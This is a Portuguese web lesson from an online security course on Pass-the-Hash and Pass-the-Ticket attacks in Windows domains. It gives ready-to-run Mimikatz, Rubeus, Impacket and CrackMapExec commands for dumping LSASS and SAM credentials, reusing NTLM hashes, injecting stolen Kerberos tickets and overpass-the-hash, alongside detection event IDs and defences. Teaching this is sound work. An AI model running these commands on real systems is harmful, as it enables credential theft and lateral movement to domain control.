Cyber Security Academy · Aula

Ataques Pass-the-Hash e Pass-the-Ticket

Use hashes de credenciais e tíquetes Kerberos para se mover lateralmente sem conhecer as senhas em texto simples.

Aula 2 de 413 etapas

Ataques Pass-the-Hash e Pass-the-Ticket é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 2 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.

Por que esses ataques existem

Os protocolos de credenciais do Windows armazenam segredos de autenticação (hashes NTLM e tíquetes Kerberos) na memória. Um invasor com privilégios de SYSTEM pode extrair esses segredos e reutilizá-los para se autenticar como outros usuários sem saber as senhas.

Extração de hashes NTLM com Mimikatz

O Mimikatz é a principal ferramenta de extração de credenciais no Windows. Quando executado como SYSTEM/Administrador, ele lê a memória do processo LSASS para extrair hashes NTLM e credenciais em texto simples.

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam

Uso direto do hash (PtH) com Mimikatz

O PtH injeta um hash NTLM em uma nova sessão sem que seja necessário conhecer a senha em texto simples. O hash autentica o usuário em serviços remotos usando NTLM — uma técnica eficaz para movimentação lateral para outros computadores Windows.

# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
  /ntlm:aad3b435b51404eeaad3b435b51404ee \
  /run:cmd.exe

# Opens cmd.exe authenticated as that user

Uso direto do hash com Impacket

O Impacket fornece ferramentas Python para PtH: psexec.py, smbexec.py e wmiexec.py aceitam hashes NTLM diretamente para executar comandos remotamente.

# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
  -hashes aad3b435...:8846f7eaee8fb117...

# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
  -hashes :8846f7eaee8fb117ad06bdd830b7586c

Extração de tíquetes Kerberos

Os tíquetes Kerberos também são armazenados na memória do LSASS. O Mimikatz os extrai; o Rubeus é a ferramenta especializada em operações com tíquetes Kerberos no Windows.

# Mimikatz: export all tickets
sekurlsa::tickets /export

# Rubeus: list tickets
Rubeus.exe triage

# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgt

Uso direto do tíquete (PtT)

O PtT injeta um tíquete Kerberos roubado na sessão atual. O tíquete autentica o usuário nos serviços como o proprietário original do tíquete — não é necessário ter o hash nem a senha.

# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi

# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify injection
klist

Despejo remoto do LSASS

A partir de um ponto de apoio, faça o despejo remoto do LSASS usando o CrackMapExec ou o secretsdump do Impacket — não é necessária uma sessão interativa no destino.

# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa

# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100

Caminhos de movimentação lateral

Depois de obter hashes ou tíquetes, movimente-se lateralmente: use PtH em outras máquinas com a reutilização de administradores locais, use PtT para acessar serviços do domínio e avance em direção aos privilégios de administrador do domínio visando contas privilegiadas.

Detecção de PtH e PtT

Os defensores detectam PtH por meio de: ID de evento 4624 (logon) com tipo de logon 3 e sem um logon interativo correspondente, anomalias na autenticação NTLM e assinaturas do Mimikatz na memória ou no disco.

# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential use

Medidas de proteção

Principais medidas: habilite o Credential Guard (que protege o LSASS por meio de virtualização), restrinja a reutilização de administradores locais entre máquinas (LAPS), exija o grupo Protected Users para contas privilegiadas e desative o NTLM sempre que possível.

Conversão de hash em tíquete

A conversão de hash transforma um hash NTLM em um TGT do Kerberos. Isso é útil em ambientes nos quais o NTLM está bloqueado, mas o Kerberos está disponível, ou quando você precisa de um TGT para realizar outros ataques ao Kerberos.

# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
  /ntlm:8846f7eaee8fb117ad06bdd830b7586c \
  /run:powershell.exe

# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...

Verificação rápida

Qual recurso de segurança do Windows protege o armazenamento de credenciais do LSASS usando virtualização?

Resumo: PtH e PtT

O uso direto do hash e o uso direto do tíquete são a base da movimentação lateral no Active Directory. Ambos exploram o armazenamento em cache de credenciais do Windows no LSASS. O Mimikatz e o Impacket tornam a extração e a reutilização triviais. Defenda-se usando Credential Guard, LAPS, o grupo Protected Users e monitoramento rigoroso dos eventos de autenticação NTLM e Kerberos.

Grátis para começar

Aprenda Cyber Security Academy com um tutor de IA — grátis

Escreva e execute código real no seu navegador, obtenha ajuda instantânea de um tutor de IA 24/7 e continue de onde parou na web ou no app.

Cursos
76
Aulas
303

Perguntas Frequentes

A aula “Ataques Pass-the-Hash e Pass-the-Ticket” é grátis?

Sim — o texto completo de “Ataques Pass-the-Hash e Pass-the-Ticket” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.

O que vou aprender em “Ataques Pass-the-Hash e Pass-the-Ticket”?

Use hashes de credenciais e tíquetes Kerberos para se mover lateralmente sem conhecer as senhas em texto simples. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Cyber Security Academy?

Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 2 de 4.

Quanto tempo leva a aula “Ataques Pass-the-Hash e Pass-the-Ticket”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Cyber Security Academy?

Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Autenticação do Windows: NTLM e Kerberos
  2. Ataques Pass-the-Hash e Pass-the-Ticket
  3. Kerberoasting e AS-REP Roasting
  4. Fortalecimento do Active Directory
← Voltar para Cyber Security Academy